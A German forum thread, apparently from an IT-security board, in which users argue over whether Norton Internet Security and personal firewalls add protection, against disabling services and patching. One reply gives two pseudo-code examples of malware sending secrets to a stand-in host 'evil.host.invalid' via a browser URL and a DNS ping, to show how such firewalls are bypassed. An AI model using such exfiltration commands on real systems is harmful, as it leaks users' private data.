Hi, ich habe mal eine Frage. Ich habe 2 Rechner, der eine Direkt ans Internet angeschlossen. Der 2. mit einer Netzwerkkarte mit dem ersten verbunden. Will mit dem ersten Downloaden und der 2. soll zum surfen sein. Hab im moment auf beiden Rechner Norton Internet Security. Brauche ich auf dem 2. Rechner, der nur zum surfen sein soll auch eine Firewall und Auto-Project? Oder regelt das alles der 1.?
Hallo
Hab im moment auf beiden Rechner Norton Internet Security.
Warum?
Brauche ich auf dem 2. Rechner, der nur zum surfen sein soll auch
eine Firewall und Auto-Project? Oder regelt das alles der 1.?
Norton InSecurity brauchst Du IMHO auf gar keinem Rechner, da dieses StĂŒck Software die Sicherheit nicht wirklich verbessern kann. Weiters wird eine Firewall-Lösung prinzipiell am Netzwerk-Perimeter eingerichtet. Also dort, wo das LAN und das âböseâ Internet zusammentreffen. In Deinem Fall also zwischen Deinem 1. Rechner und dem Internet.
Damit Du die fĂŒr Deine BedĂŒrfnisse passendste Lösung finden kannst, empfiehlt es sich, zunĂ€chst möglichst umfangreiches Wissen anzueignen. Als LektĂŒre fĂŒr den Anfang wĂŒrde ich http://www.linkblock.de empfehlen. Und auf http://www.dingens.org gibts ein kostenloses Tool, welches Dir hilft, die Dienste von Deinen Rechnern sinnvoll zu konfigurieren. Allerdings ist es ratsam, die dort verlinkten weiterfĂŒhrenden Informationen ebenfalls zu studieren.
CU
Peter
Hallo Peter,
Norton InSecurity brauchst Du IMHO auf gar keinem Rechner, da
dieses StĂŒck Software die Sicherheit nicht wirklich verbessern
kann.
da bin ich ganz anderer Meinung. Durch die automatische Port-Blockierung ist ein erheblicher Sicherheitszuwachs gegeben. Trojaner und Backdoors haben da keine Chance mehr. Aber auch andere Viren, die man sich schon durch die pure Verbindung zum Internet ohne Firewall zuziehen kann, haben es damit sehr schwer. Wir hatten da vor etwa einem Jahr einen Fall, in dem sehr viele Rechner befallen waren. Der automatische Scan aller Downloaddateien bietet weitere Sicherheit (bei aktueller Virendatenbank). Auch Kazaa-Downloads und sonst alles, was irgendwie aus dem Internet an Daten auf den Rechner kommt, wird auf Viren und maligne Scripte gecheckt. Der E-Mail-Scan kann ebenfalls maligne Scripte erkennen u.s.w. Sehr schön ist auch die Popup-Block-Funktion. FĂŒr den Ottonormalsurfer ist eine Firewall wie die Norton Personal Firewall bzw. Norton Internet Security IMHO mit Sicherheit ein sehr gutes, leicht einstellbares und effektives Sicherheits-Tool. UnabhĂ€ngige Tests beweisen, dass diese Software von Symantec ganz oben mitmischen kann. Was glaubst du, vor wievielen Viren das âStĂŒck Softwareâ mich bereits bewahrt hat (wenn ich dem Logbuch glauben soll)? Ich finde, ein Antiviren-Programm zu installieren ist immer besser als keines zu installieren. Die eigene Vorsicht trĂ€gt natĂŒrlich auch ihres dazu bei.
GruĂ
Heiliger Bimbam
Hallo,
[âŠ]
Durch die automatische
Port-Blockierung ist ein erheblicher Sicherheitszuwachs
gegeben.
Nein.
Trojaner und Backdoors haben da keine Chance mehr.
Interessant. Im Zweifel schalten die Norton einfach ab. Vielleicht solltst Du dafĂŒr sorgen, daĂ sie ersta garnicht auf den Rechner kommen?
Aber auch andere Viren, die man sich schon durch die pure
Verbindung zum Internet ohne Firewall zuziehen kann, haben es
damit sehr schwer.
Vielleicht solltest Du Dein Windows einfach mal aktuell halten?
Wir hatten da vor etwa einem Jahr einen
Fall, in dem sehr viele Rechner befallen waren.
Ihr solltet Eure Administratoren schulen. Offenbar besteht da Bedarf. Oder wie konkret wer es zu einer Infektion gekommen?
Der
automatische Scan aller Downloaddateien bietet weitere
Sicherheit (bei aktueller Virendatenbank). Auch
Kazaa-Downloads und sonst alles, was irgendwie aus dem
Internet an Daten auf den Rechner kommt, wird auf Viren und
maligne Scripte gecheckt.
Aha. Und sonst fĂŒhrst Du alles aus, was âso aus dem Internetâ kommt? Mutig.
Der E-Mail-Scan kann ebenfalls
maligne Scripte erkennen u.s.w. Sehr schön ist auch die
Popup-Block-Funktion.
Das hat doch ein moderner Browser eingebaut. Oder habe ich etwas verpasst?
FĂŒr den Ottonormalsurfer ist eine
Firewall wie die Norton Personal Firewall bzw. Norton Internet
Security IMHO mit Sicherheit ein sehr gutes, leicht
einstellbares und effektives Sicherheits-Tool.
Nein. Du solltest die FAQ des IT-Sicherheitsbrettes lesen.
UnabhÀngige
Tests beweisen, dass diese Software von Symantec ganz oben
mitmischen kann.
Den âUnabhĂ€ngigen Testâ möchte ich bitte lesen. brigens: Tote Fische mischen auch âganz obenâ mit.
Was glaubst du, vor wievielen Viren das
âStĂŒck Softwareâ mich bereits bewahrt hat (wenn ich dem
Logbuch glauben soll)?
Das Logbuch ist bei derartigen Programmen in erster Linie ein Marketing-Instrument, in dem triviale und irrelevante Ereignisse als Situation deklariert werden, die durch Norton entschÀrft wurden. Das ist hochgradig unseriös.
Ich finde, ein Antiviren-Programm zu
installieren ist immer besser als keines zu
installieren.
Das finde ich nicht. Schon garnicht nicht in der PauschalitÀt.
Die eigene Vorsicht trĂ€gt natĂŒrlich auch ihres
dazu bei.
Nein, die ist - neben sicherer Konfiguration des Rechners und aktueller Software - der wichtigste Punkt.
GruĂ,
Sebastian
edit Mod (Heiner): Ich habe mal die Spitze gegen das andere Mitglied durch [âŠ] ersetzt.
1 Like
[âŠ]
Nun mal Spass beiseite: wenn ein Programm (wie immer es heiĂen mag) diesen oder jenen Virus gefunden hat, dann IST es in jedem Fall besser, als den Virus auf dem Rechner zu haben, sei es ein bewusster Download oder der Anhang einer Mail. Basta. Tja natĂŒrlich weiĂ ich, dass ich nicht alles ausfĂŒhren soll, was da so reintrudelt, aber manchmal lĂ€dt man sich ein vermeintlich sauberes Tool herunter und schon istâs passiert. Mir ist sehr wohl klar, dass die AktualitĂ€t der Software wichtig ist, aber du glaubst doch nicht im Ernst, dass irgendwo in einem Rechnerverbund mit hunderten von Rechnern sofort nach dem Erscheinen auf jedem einzelnen das Patch installiert wird. Die Admins wĂ€ren doch dann nur noch mit der Installation der Patches beschĂ€ftigt.
[âŠ]
Nein.
Doch!
Vielleicht solltst Du dafĂŒr sorgen, daĂ sie ersta garnicht auf
den Rechner kommen?
Wie gesagt, mancher Surfer macht sich da nicht so viele Gedanken oder er hat keine Lust, sich Gedanen zu machen. Dem hilft die Software. Was ist denn dabei? Es sind doch meine Ressourcen, die sie verbraucht!
Vielleicht solltest Du Dein Windows einfach mal aktuell
halten?
Ist bereits ausreichend erörtert.
Ihr solltet Eure Administratoren schulen. Offenbar besteht da
Bedarf. Oder wie konkret wer es zu einer Infektion gekommen?
Ich bin kein Administrator und kann nicht beurteilen, wie es dazu kam und ob der Virus nicht etwa mit einer Fremd-CD-ROM eingeschleppt wurde.
Aha. Und sonst fĂŒhrst Du alles aus, was âso aus dem Internetâ
kommt? Mutig.
Nein, nicht mutig, sondern bedacht - mit minimalem Restrisiko nachdem die bei mir stets brandaktuelle Firewall das gecheckt hat.
Nein. Du solltest die FAQ des IT-Sicherheitsbrettes lesen.
Okay, die Sicherheit ist niemals komplett, aber die Firewall verhindert wenigstens einen Teil der Angriffsversuche und somit ist die Sicherheit bereits gestiegen, wenn auch - wie du betonst - nicht komplett. Nicht jeder hat Lust und Zeit, sich die Grundlagen der IT-Sicherheit reinzutun. Mancher will einfach nur surfen und sich nicht durch unĂŒbersichtliche FAQ quĂ€len.
Den âUnabhĂ€ngigen Testâ möchte ich bitte lesen. brigens: Tote
Fische mischen auch âganz obenâ mit.
Ich habe bereits Tests von Firewalls in der âComputer-Bildâ und in einer anderen Zeitschrift (weiĂ nicht mehr welche) gelesen und da war einmal die NPF an Platz 1 und ein anderes Mal an Platz 2. Das spricht IMHO fĂŒr sich. Und die Fachleute, die das gemacht haben, die kennen sich bestimmt damit aus. Aber ich weiĂ, dein Geist ist in jedem Fall genialer und du kennst dich damit noch viel besser aus. Das wollen wir hier nicht verschweigen.
Das Logbuch ist bei derartigen Programmen in erster Linie ein
Marketing-Instrument, in dem triviale und irrelevante
Ereignisse als Situation deklariert werden, die durch Norton
entschÀrft wurden. Das ist hochgradig unseriös.
Ist es nicht. Virus gefunden und Datei repariert oder gelöscht ist NICHT irrelevant.
Ich finde, ein Antiviren-Programm zu
installieren ist immer besser als keines zu
installieren.Das finde ich nicht. Schon garnicht nicht in der PauschalitÀt.
Das finde ich aber doch.
Nein, die ist - neben sicherer Konfiguration des Rechners und
aktueller Software - der wichtigste Punkt.
Jo, auch die Personal Firewall muss aktuell sein. Aber das erledigt LiveUpdate ganz von alleine.
GruĂ
Heiliger Bimbam
edit Mod (Heiner): Auch hier habe ich eine Spitze gegen ein anderes Mitglied durch [âŠ] ersetzt.
[âŠ]
Nun mal Spass beiseite: wenn ein Programm (wie immer es heiĂen
mag) diesen oder jenen Virus gefunden hat, dann IST es in
jedem Fall besser, als den Virus auf dem Rechner zu haben, sei
es ein bewusster Download oder der Anhang einer Mail. Basta.
Personal firewall (aka. Paketfilter)? Viren? Verwechseln wir da gerade was?
Und wenn es fuenf anderen Haus und Hof oeffnet? Das solche Programme sich eher stoerend auf die Kommunikation im Netz auswirken ist auch schon oefter aufgetreten.
Tja natĂŒrlich weiĂ ich, dass ich nicht alles ausfĂŒhren soll,
was da so reintrudelt, aber manchmal lÀdt man sich ein
vermeintlich sauberes Tool herunter und schon istâs passiert.
Wenn Du software aus nicht vertrauenswuerdigen Quellen ausfuehrst hilft Dir der Norten-Krempel auch nicht.
Mir ist sehr wohl klar, dass die AktualitÀt der Software
wichtig ist, aber du glaubst doch nicht im Ernst, dass
irgendwo in einem Rechnerverbund mit hunderten von Rechnern
sofort nach dem Erscheinen auf jedem einzelnen das Patch
installiert wird. Die Admins wÀren doch dann nur noch mit der
Installation der Patches beschÀftigt.
Dann sind die Admins offensichtlich unterqualifiziert und sollten sich dementsprechend fortbilden oder einen anderen Job suchen. Das von Dir beschriebene Konzept ist im Aufwand linear mit der Anzahl der hosts: es wird niemals skalieren und ist damit nicht brauchbar.
Hier kuerze ich mal etwas ab:
Nein.
Doch!
Niemals.
Wohl!!1
Gar nicht.
Sicher.
Falsch, falsch, falsch und dreimal falsch. Naehnaeh, naenaehnaeh⊠Koennen wir solche âNein-Doch-Wohl-Diskussionenâ lassen? Danke.
Wie gesagt, mancher Surfer macht sich da nicht so viele
Gedanken oder er hat keine Lust, sich Gedanen zu machen. Dem
hilft die Software.
Nein. Schadsoftware schaltet diese software einfach aus oder umgeht sie.
Was ist denn dabei?
Dass Du Dich in eine falsche Sicherheit wiegst, durch Dein unvorsichtiges Verhalten Dein Rechner mit Schadsoftware verseucht wird. Und dannâŠ
Es sind doch meine Ressourcen, die sie verbraucht!
⊠sind es auch meine resourcen, die Du verbrauchst. Ich kenne Menschen, die haben in ihrer mailbox ein Verhaeltnis von 1:20 zwischen echten mails und viren (+spam). Der ueberwiegende Teil duerfte von verseuchten Rechnern kommen.
Ihr solltet Eure Administratoren schulen. Offenbar besteht da
Bedarf. Oder wie konkret wer es zu einer Infektion gekommen?Ich bin kein Administrator und kann nicht beurteilen, wie es
dazu kam und ob der Virus nicht etwa mit einer Fremd-CD-ROM
eingeschleppt wurde.
Dann muss ich Sebastian zustimmen: eure Administratoren sollten geschult werden.
Aha. Und sonst fĂŒhrst Du alles aus, was âso aus dem Internetâ
kommt? Mutig.Nein, nicht mutig, sondern bedacht - mit minimalem Restrisiko
nachdem die bei mir stets brandaktuelle Firewall das gecheckt
hat.
Du hast keine firewall. Deine personal firewall kann das nicht verhindern. Konkret: wie verhindert pfw, dass $malware system("iexplorer.exe http://evil.host.ivalid/badscript.php?info=this_is_yâŠ) aufruft? Wie verhindert pfw, dass $malware system(âping this.is.your.secret.information.evil.host.invalidâ) aufruft?
Nein. Du solltest die FAQ des IT-Sicherheitsbrettes lesen.
Okay, die Sicherheit ist niemals komplett, aber die Firewall
verhindert wenigstens einen Teil der Angriffsversuche und
somit ist die Sicherheit bereits gestiegen, wenn auch - wie du
betonst - nicht komplett.
Du begnuegst Dich mit einer Sicherheitsloesung, die manchmal vielleicht, wenn auch bekanntermassen schlecht funktioniert? Du mutest dem Nutzer all die Probleme zu, mit denen Du oben bei Deinem Eudora-Problem zu kaempfen hast?
Nicht jeder hat Lust und Zeit, sich die Grundlagen der
IT-Sicherheit reinzutun.
Ich wollte auch nicht zur Fahrschule gehen und mir diesen ganzen Grundlagen-Mist mit Verkehrszeichen und weissen Streifen auf der Strasse antunâŠ
Mancher will einfach nur surfen
⊠ich wollte einfach nur autofahren.
und sich nicht durch unĂŒbersichtliche FAQ quĂ€len.
Hast Du Dir diese unuebersichtlichen FAQs mal angesehen?
Den âUnabhĂ€ngigen Testâ möchte ich bitte lesen.
Ich auch.
Ich habe bereits Tests von Firewalls in der âComputer-Bildâ
und in einer anderen Zeitschrift (weiĂ nicht mehr welche)
gelesen und da war einmal die NPF an Platz 1 und ein anderes
Mal an Platz 2. Das spricht IMHO fĂŒr sich.
Die halbseitige Anzeige, die Symantec zwei Seiten weiter geschalten hat auch⊠Bitte jetzt mit dem Denken anfangen. Glaubst Du, diese Werbung gaebe es noch dort, wenn $Zeitschrift das beworbene Produkt wirklich kritisch testet und regelmaessig auf Sicherheitsprobleme hinweist?
Und die Fachleute,
Namen?
die das gemacht haben, die kennen sich bestimmt damit aus.
Bestimmt. Peter Huth ist auch bestimmt ein Sicherheitsexperte. Mich wuerde mal ganz einfach interessieren, welche Aspekte der software getestet wurden.
Ist es nicht. Virus gefunden und Datei repariert oder gelöscht
ist NICHT irrelevant.
Du mengst hier munter zwischen personal firewalls und Virenscannern hin und her. Vielleicht moechtest Du Dich mal entscheiden, worueber wir reden. (Gleich vorab: zu Virenscannern sage ich nichts, halte sie persoenlich aber auch fuer ueberfluessig.)
Das finde ich nicht. Schon garnicht nicht in der PauschalitÀt.
Das finde ich aber doch.
Nein. Doch. Niemals. Klar, bestimmt. Gar nicht war⊠blabla, blabla.
Jo, auch die Personal Firewall muss aktuell sein. Aber das
erledigt LiveUpdate ganz von alleine.
Zwei Dinge updaten? Wenn eins reicht?
Gruss vom Frank.
edit Mod (Heiner): Ich musste nur ein Zitat abwandeln (mit [âŠ] ersetzt), da der betreffende Teil im VorgĂ€ngerartikel auch gelöscht wurde.
1 Like
Hallo Heiliger Bimbam
Norton InSecurity brauchst Du IMHO auf gar keinem Rechner, da
dieses StĂŒck Software die Sicherheit nicht wirklich verbessern
kann.da bin ich ganz anderer Meinung.
So? Schön, schauen wir mal.
Durch die automatische Port-Blockierung ist ein erheblicher
Sicherheitszuwachs gegeben.
Du meinst die Port-Blockierung durch Norton InSecurity? Sorry, da liegst Du falsch. Sinnvoller ist es, den Rechner (ja, das muss man mit jedem einzelnen Rechner des betreffenden Netzwerks machenâŠ) so zu konfigurieren, dass keine Dienste laufen und somit gar keine Ports geöffnet sind. Oder nur die Dienste laufen und im LAN erreichbar sind, von denen man das explizit wĂŒnscht.
Eine Personal Firewall vor einen offenen Port zu schalten ist wie einen Vorhang an einen Durchgang zu hÀngen. Den Dienst zu beenden und den Port dadurch zu schliessen, ist dagegen wie ein Zumauern des Durchgangs.
Trojaner und Backdoors haben da keine Chance mehr.
Trojaner, Backdoors, Viren etc. können, wenn sie einmal auf dem Rechner sind, allfÀllige Placebo-Software wie Norton InSecurity umgehen oder gleich ganz abschiessen. Der Selbstschutz von solcher Software ist leider in den meisten FÀllen schlicht nicht vorhanden.
Aber auch andere Viren, die man sich schon durch die pure
Verbindung zum Internet ohne Firewall zuziehen kann, haben es
damit sehr schwer.
Da kenne ich im Moment zwei StĂŒck, Sasser und Blaster. Beide nutzen eine SicherheitslĂŒcke in einem Dienst von Windows (einmal LSASS, einmal RPC) aus. Bei einem korrekt gewarteten System sind die Patches, die a) vor den WĂŒrmern verfĂŒgbar waren und b) die jeweiligen SicherheitslĂŒcken schliessen, lĂ€ngst eingespielt.
In so einem Fall kann eine Personal Firewall allenfalls temporÀr helfen, wenn man sich diese Patches aus dem Internet holen muss.
Der automatische Scan aller Downloaddateien bietet weitere
Sicherheit (bei aktueller Virendatenbank).
Wenn ein Antivirentool beim Scan einer Datei etwas findet, muss die betreffende Datei nicht in jedem Fall infiziert sein. Und wenn es nichts findet, heisst das noch lange nicht, dass die Datei wirklich sauber ist. Aber bitte, wer will kann sich gern ein Antivirentool einrichten.
Der E-Mail-Scan kann ebenfalls maligne Scripte erkennen u.s.w.
Einen expliziten Email-Scan braucht man nicht. Man konfiguriert sein Mailprogramm so, dass es nichts ohne Zutun des Benutzers ausfĂŒhrt. Und am besten auch so, dass es alle Mails als Plaintext angezeigt werden. Wenn man dann alle Mailattachments nach den selben GrundsĂ€tzen behandelt (Mailattachments gelten grundsĂ€tzlich erstmal als gefĂ€hrlich. So lange, bis man eigenhĂ€ndig geprĂŒft hat, ob sie gefĂ€hrlich sind oder nicht) und sich einigermassen ĂŒber die jeweils kursierenden WĂŒrmer etc. informiert, erkennt man das ganze Wurm-Zeugs vom Schiff aus.
Sehr schön ist auch diePopup-Block-Funktion.
Das brauche ich nicht, das hat Mozilla Firefox schon eingebaut. Den IE sollte man ohnehin nicht verwenden, da der inhÀrent unsicher ist.
FĂŒr den Ottonormalsurfer ist eine
Firewall wie die Norton Personal Firewall bzw. Norton Internet
Security IMHO mit Sicherheit ein sehr gutes, leicht
einstellbares und effektives Sicherheits-Tool.
Das ist ein grosser Irrglaube. Damit eine Personal Firewall einigermassen sinnvoll eingesetzt werden kann, muss sie möglichst detailliert konfiguriert werden. Dazu ist aber, allen bunten OberflÀchen dieser Tools zum Trotz, Wissen zwingend notwendig. Und genau dieses Wissen hat der Ottonormalsurfer nicht. Es artet daher zu russischem Roulette aus, wenn sich so jemand so eine Software installiert.
UnabhÀngige Tests beweisen, dass diese Software von Symantec ganz
oben mitmischen kann.
Quellen? Und bitte keine Tests von Zeitschriften wie CHIP, PC-Welt o.À., denn die sind a) nicht unabhÀngig und b) meist nicht das Papier wert, auf denen sie gedruckt sind.
Andererseits: Hast Du Dir mal http://www.linkblock.de durchgelesen? Wenn nein, solltest Du das mal tun.
Was glaubst du, vor wievielen Viren das
âStĂŒck Softwareâ mich bereits bewahrt hat (wenn ich dem
Logbuch glauben soll)?
Was glaubst Du, wie viele Viren hat das Ding gar nicht erst erkannt?
Ich finde, ein Antiviren-Programm zu
installieren ist immer besser als keines zu
installieren. Die eigene Vorsicht trĂ€gt natĂŒrlich auch ihres
dazu bei.
Ein Antivirentool kann man gern verwenden. Es ging hier aber um Personal Firewalls. Die sind noch weniger nĂŒtzlich als Antivirentools.
BTW: Ich selber habe auf meinen privaten PCs zu Hause keine Antivirensoftware. Von PFW gar nicht erst zu reden. Und dennoch laufen meine Rechner sauber und korrekt, ganz ohne VirenâŠ
CU
Peter
Hallo,
alle Jahre wieder versucht eine solch verunglĂŒckte Seele wie Du es bist diesen hier anwesenden, im dunklen Keller ausharrenden Geeks und Nerds die praktische Welt der DAUS nĂ€her zu bringen *mitleidiglĂ€chel*
Spar dir die krĂ€fte. ist wie gegen WindmĂŒhlen kĂ€mpfen 
Nun mal Spass beiseite: wenn ein Programm (wie immer es heiĂen
mag) diesen oder jenen Virus gefunden hat, dann IST es in
jedem Fall besser, als den Virus auf dem Rechner zu haben, sei
es ein bewusster Download oder der Anhang einer Mail. Basta.
Nicht ganz basta
Einen Virus entfernt man mit einem Antivirenprogramm. Diese Norton Security Suite ist aber ein Paket aus vielen versciedenen Dingensens und der grosse Teil darin ist dieses dubiose (ich nenns einfach mal so) Firewall Geschicte und der kleinere Teil ist eben die Antivirengeschichte.
Wenn Du NUR Antivirus instalierst geb ich Dir recht. Der Rest aus dem sonnengelben Paketchen wĂŒrde ich allerdings nicht installieren
Den âUnabhĂ€ngigen Testâ möchte ich bitte lesen. brigens: Tote
Fische mischen auch âganz obenâ mit.Ich habe bereits Tests von Firewalls in der âComputer-Bildâ
und in einer anderen Zeitschrift (weiĂ nicht mehr welche)
gelesen und da war einmal die NPF an Platz 1 und ein anderes
Mal an Platz 2. Das spricht IMHO fĂŒr sich. Und die Fachleute,
die das gemacht haben, die kennen sich bestimmt damit aus.
Bevor das andere tun nehme ich mal vorweg, das das hier einige eher in schallendes GelÀchter ausbrechen lÀsst. Glaubst Du etwa auch alles was in der bildzeitung steht?!
GruĂ
h.
Hallo,
in diesem Thread stellt sich die Frage, was eine Personal-Firewall auf einem Rechner in einem Privatnetzwerk an Sicherheitsgewinn bringt. Und die einzige Antwort ist: Sie schĂŒtzt derzeit vor genau eine Art von Virus, besser gesagt Wurm, nĂ€mlich die Sorte, die sich ĂŒber den RPC-Bug in Windows verbreitet. Ansonsten ist die Schutzwirkung auf einem sauber konfigurierten PC gleich null. Hat man dann auch noch den Patch installiert, kann die PF komplett abgeschaltet werden.
Viel wichtiger ist ein aktueller Virenscanner, der einen vor den eigentlichn Gefahren bewahrt. Und hat man tatsÀchlich mal einen Virus auf dem Rechner, den man z.B. beim scannen der Festplatte findet, dann hat das Sicherheitssystem bereits versagt und eine Neuinstallation wÀre anzuraten.
Ich bezweifle also, ob sich das Geld fĂŒr eine PF lohnt. Bei einem Virenscanner steht das auĂer Frage.
UnabhÀngige
Tests beweisen, dass diese Software von Symantec ganz oben
mitmischen kann.
Quellen?
Was glaubst du, vor wievielen Viren das
âStĂŒck Softwareâ mich bereits bewahrt hat (wenn ich dem
Logbuch glauben soll)?
Problem! Du sollst zwar dem Logbuch glauben, darfst es aber nicht. Wahrscheinlich hat dich die PF vor 3.000.000 Pings bewahrt. Ob das ein Erfolg ist?
Ciao
Kaj
Hallo HB
Nun mal Spass beiseite: wenn ein Programm (wie immer es heiĂen
mag) diesen oder jenen Virus gefunden hat,
Bitte anders formulieren: âwenn ein Programm diesen oder jenden Virus gefunden zu haben meintâ trifft die Sache eher.
Wenn man eine Datei hat, die ein Virus enthalten kann oder auch nicht, mit einem Antivirentool prĂŒft, so können zwei Dinge passieren:
Das Antivirentool findet nichts. Das kann daran liegen, dass die Datei tatsĂ€chlich âsauberâ ist. Es kann aber auch daran liegen, dass das Antivirentool die Malware aus irgendeinem Grund nicht erkannt hat.
Das Antivirentool findet etwas (oder meint es zumindest). Da kann es tatsĂ€chlich sein, dass der gemeldete Plagegeist in der Datei enthalten ist. Es kann aber auch ein Fehlalarm sein (Bytefolge, die zufĂ€llig auf eine Virensignatur passtâŠ).
Man weiss daher genaugenommen nach dem Scan genau gleichviel wie vor dem Scan: Die Datei könnte ein Virus o.À. enthalten, oder auch nicht. Einen wirklichen Vorteil bringt das Antivirentool daher eigentlich nicht.
âŠdann IST es in
jedem Fall besser, als den Virus auf dem Rechner zu haben, sei
es ein bewusster Download oder der Anhang einer Mail. Basta.
Irgendwie verstehe ich diesen Satz nicht wirklich. Da fehlt wohl etwas.
Tja natĂŒrlich weiĂ ich, dass ich nicht alles ausfĂŒhren soll,
was da so reintrudelt, aber manchmal lÀdt man sich ein
vermeintlich sauberes Tool herunter und schon istâs passiert.
Da hilft Dir ein Antivirentool aber auch nicht wirklich. Oder nur zufÀllig. Darauf verlassen sollte man sich jedenfalls nicht.
Mir ist sehr wohl klar, dass die AktualitÀt der Software
wichtig ist, aber du glaubst doch nicht im Ernst, dass
irgendwo in einem Rechnerverbund mit hunderten von Rechnern
sofort nach dem Erscheinen auf jedem einzelnen das Patch
installiert wird. Die Admins wÀren doch dann nur noch mit der
Installation der Patches beschÀftigt.
In einem Rechnerverbund mit hunderten von Rechnern ist das auch nicht unbedingt zwingend nötig. Ein solches LAN, welches sich in einer Firma, einer UniversitĂ€t o.Ă€. befindet, dĂŒrfte ĂŒber entsprechende Infrastruktur wie Firewall (nein, keine Personal Firewall, sondern eine Lösung, die diesen Namen auch verdientâŠ), DMZ und Ă€hnliches verfĂŒgen. Da ist es fĂŒr Blaster oder Sasser sehr viel schwerer, sich zu verbreiten. Die grösste Gefahr sind da Rechner (Notebooks), die von extern in das LAN gelangen. In solch einem Netzwerk mĂŒssen die Administratoren daher entsprechende Lösungen einsetzen.
Im ĂŒbrigen dĂŒrfte solch ein Netzwerk ĂŒber irgendeine Lösung verfĂŒgen, mit der Software im Netzwerk verteilt werden kann, so dass die flĂ€chendeckende Verteilung des jeweiligen Patch, so er denn ausgetestet ist, kein wirkliches Problem darstellt.
Vielleicht solltst Du dafĂŒr sorgen, daĂ sie ersta garnicht auf
den Rechner kommen?Wie gesagt, mancher Surfer macht sich da nicht so viele
Gedanken oder er hat keine Lust, sich Gedanen zu machen.
Wer sich da keine Gedanken machen will oder kann, sollte sich an jemanden wenden, der das fĂŒr ihn tutn.
Ich will mir auch keine Gedanken darĂŒber machen, wie der Motor oder die Bremsen meines Autos im Detail funktionieren. Daher wende ich mich fĂŒr Service, Reparaturen etc. an eine Werkstatt mit entsprechend ausgebildetem Personal. Ja, das kostet jeweils Geld. Aber ich bin ziemlich sicher, dass die notwendigen Arbeiten fachgerecht ausgefĂŒhrt werden.
Dem hilft die Software.
Nein, das tut sie nicht. Ein Antivirentool mag ja noch angehen. Aber eine Software wie eine Personal Firewall hilft nicht âeinfach soâ durch Installation. Das ist ein ganz grosser Irrglaube.
Damit eine PFW etwas nĂŒtzen kann, muss sie zwingend konfiguriert werden. Um sie jedoch sinnvoll konfigurieren zu können, ist in jedem Fall Wissen notwendig. Ansonsten wĂ€re das, wie wenn ich an den Bremsen meines Autos manipuliere: Ob die nachher noch funktionieren oder nicht, wĂ€re reine Lotterie. Russisch Roulette.
Aha. Und sonst fĂŒhrst Du alles aus, was âso aus dem Internetâ
kommt? Mutig.Nein, nicht mutig, sondern bedacht - mit minimalem Restrisiko
nachdem die bei mir stets brandaktuelle Firewall das gecheckt
hat.
Eine Firewall checkt gar nichts. Was Du meinst, ist allenfalls das Antivirentool.
Nein. Du solltest die FAQ des IT-Sicherheitsbrettes lesen.
Okay, die Sicherheit ist niemals komplett, aber die Firewall
verhindert wenigstens einen Teil der Angriffsversuche
Nein, tut sie nicht. Sie verhindert vielleicht, dass ein âAngriffsversuchâ erfolgreich ist. Dass aber Angriffsversuche stattfinden, daran Ă€ndert eine Personal Firewall nichts.
Allerdings neigen die Dinger dazu, irgendwelche harmlosen Sachen wie einen Ping oder einen einfachen Portscan gleich als âAngriffâ zu melden. Das ist schon mal Quatsch.
Andererseits ist es sinnvoller, die AngriffsflÀche, die ein Rechner im Internet bietet, zu verringern. Das geht aber nicht mit einer PFW. Im Gegenteil, die vergrössert die AngriffsflÀche. Verringern kann ich die AngriffsflÀche, indem ich keine Dienste nach aussen anbiete. Ausser vielleicht einzelnen Diensten, von denen ich das explizit will (etwa wenn ich einen eigenen Webserver betreibe).
Das Beenden von Diensten und das damit verbundene Schliessen der jeweiligen Ports fĂŒhrt dazu, dass ein Angreifer machen kann, was er will, an geschlossenen Ports kann er nichts holen. Nada. Weil ein geschlossener Port wie eine massive Mauer mit aufgemalter TĂŒr ist.
Den âUnabhĂ€ngigen Testâ möchte ich bitte lesen. brigens: Tote
Fische mischen auch âganz obenâ mit.Ich habe bereits Tests von Firewalls in der âComputer-Bildâ
und in einer anderen Zeitschrift (weiĂ nicht mehr welche)
Ist völlig egal, welche andere Zeitschrift das war. Du hast Dich mit diesem Satz disqualifiziert. Wer einen Test von Personal Firewalls in der Computer-Bild als âunabhĂ€ngigâ bezeichnet, hat entweder keine Ahnung oder erzĂ€hlt wissentlich Unsinn.
Der Grossteil der PC-Zeitschriften ist leider alles andere als unabhĂ€ngig. Und speziell die Tests von Personal Firewalls sind zumindest fragwĂŒrdig, oft genug auch schlicht falsch und gefĂ€hrlich. Da wird ein Produkt als âgutâ bewertet, wenn es eine bunte OberflĂ€che hat, die âeinfach zu bedienenâ ist. Dass dieses Produkt jedoch in Hinsicht auf die Versprechungen des Herstellers oder der Anforderungen generell mehr oder weniger komplett versagt (z.B. Thema Selbstschutz, wenn eine PFW von âbösenâ Programmen ĂŒberlistet, abgeschossen, ja sogar die Konfiguration verĂ€ndert werden kannâŠ), finde ich sehr seltsam.
Ich selber habe ein gewisses Know How in Sachen Netzwerke. Kein absolutes Profi-Wissen und beileibe weiss ich nicht alles. Aber sogar mir strÀubt sich regelmÀssig das Gefieder, wenn ich solche Tests lese. Da ist die Gewichtung der einzelnen Testkriterien, die ich seltsam finde. Da ist aber auch oftmals ein Mangel an Transparenz in Bezug auf die Tests. Was genau getestet wurde, wie und womit, das bleibt meist unerwÀhnt.
Mir kommt das dann vor, wie wenn ein Auto-Magazin ein Auto zum Testsieger kĂŒrt, weil die Airbags farblich auf das Interieur abgestimmt sind, bei diesem Auto aber die Airbags öfter ausfallen oder völlig unvermittelt zĂŒnden.
gelesen und da war einmal die NPF an Platz 1 und ein anderes
Mal an Platz 2.
Hmmm⊠da hat wohl Symantec im zweiten Fall zuwenig gespendetâŠ
Das spricht IMHO fĂŒr sich.
Ja, es spricht fĂŒr sich. Aber anders, als Du vermutest.
Und die Fachleute, die das gemacht haben, die kennen sich bestimmt
damit aus.
Sorry, aber da muss ich Dir eine Illusion zerstören: In den Redaktionen von PC-Zeitschriften sitzen Journalisten. Die haben oftmals wenig bis gar keine Ahnung von dem, ĂŒber das sie schreiben. Und kaum eine Zeitschrift macht all diese Tests wirklich selber. Es gibt Firmen, die testen Antivirensoftware. Die liefern dann die Resultate an die PC-Zeitschriften. Was die dann daraus machen, ist deren Sache. Das dĂŒrfte ein Grund dafĂŒr sein, dass die Tests wie ich oben geschrieben habe, teils wirklich hanebĂŒchenen Unsinn enthalten.
CU
Peter
Mir ist sehr wohl klar, dass die AktualitÀt der Software
wichtig ist, aber du glaubst doch nicht im Ernst, dass
irgendwo in einem Rechnerverbund mit hunderten von Rechnern
sofort nach dem Erscheinen auf jedem einzelnen das Patch
installiert wird. Die Admins wÀren doch dann nur noch mit der
Installation der Patches beschÀftigt.
